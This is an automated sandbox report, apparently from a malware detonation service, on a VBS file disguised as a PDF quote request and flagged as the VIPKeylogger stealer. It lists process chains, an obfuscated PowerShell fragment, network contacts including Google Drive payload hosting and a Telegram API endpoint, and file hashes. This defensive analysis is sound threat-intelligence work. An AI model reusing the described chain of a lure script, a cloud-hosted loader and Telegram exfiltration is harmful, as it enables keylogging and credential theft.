Malware Analysis Report

2024-11-15 07:58

Sample ID 241024-hftvwazbkp
Target RFQ_64182MR_PDF.R00.vbs
SHA256 ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
Tags vipkeylogger discovery execution keylogger stealer
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286

Threat Level: Known bad

The file RFQ_64182MR_PDF.R00.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-24 06:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 06:41

Reported

2024-10-24 07:40

Platform

win7-20240903-en

Max time kernel

35s

Max time network

126s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp

MD5 d0a1b6f8c101524394750e499ab57ab4
SHA1 d76539a75d684d909358551bc0166f9fd0dc8e4a
SHA256 e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c
SHA512 8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c

C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

MD5 6771cd798c1df9b5eddc60071dfc6e15
SHA1 65e923600e1c2604d90a481d257dc99c23fbf1dd
SHA256 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f
SHA512 cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp

memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp

memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp

memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 06:41

Reported

2024-10-24 08:19

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4364 -ip 4364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1896

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

memory/2516-0-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp

memory/2516-1-0x000001F898C90000-0x000001F898CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbancuv1.ibb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2516-11-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-12-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-15-0x00007FFEEAAA3000-0x00007FFEEAAA5000-memory.dmp

memory/2516-16-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-17-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/2516-20-0x00007FFEEAAA0000-0x00007FFEEB561000-memory.dmp

memory/4948-21-0x00000000022B0000-0x00000000022E6000-memory.dmp

memory/4948-22-0x0000000004EC0000-0x00000000054E8000-memory.dmp

memory/4948-23-0x0000000004D10000-0x0000000004D32000-memory.dmp

memory/4948-25-0x00000000054F0000-0x0000000005556000-memory.dmp

memory/4948-24-0x0000000004DB0000-0x0000000004E16000-memory.dmp

memory/4948-35-0x00000000055A0000-0x00000000058F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 806286a9ea8981d782ba5872780e6a4c
SHA1 99fe6f0c1098145a7b60fda68af7e10880f145da
SHA256 cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

memory/4948-37-0x0000000005BE0000-0x0000000005BFE000-memory.dmp

memory/4948-38-0x0000000005C30000-0x0000000005C7C000-memory.dmp

memory/4948-40-0x0000000006D40000-0x0000000006D5A000-memory.dmp

memory/4948-39-0x0000000007380000-0x00000000079FA000-memory.dmp

memory/4948-42-0x0000000006DF0000-0x0000000006E12000-memory.dmp

memory/4948-41-0x0000000006E50000-0x0000000006EE6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

MD5 6771cd798c1df9b5eddc60071dfc6e15
SHA1 65e923600e1c2604d90a481d257dc99c23fbf1dd
SHA256 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f
SHA512 cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

memory/4948-43-0x0000000007FB0000-0x0000000008554000-memory.dmp

memory/4948-45-0x0000000008560000-0x000000000D4E8000-memory.dmp

memory/4364-58-0x0000000001000000-0x0000000002254000-memory.dmp

memory/4364-59-0x0000000001000000-0x0000000002254000-memory.dmp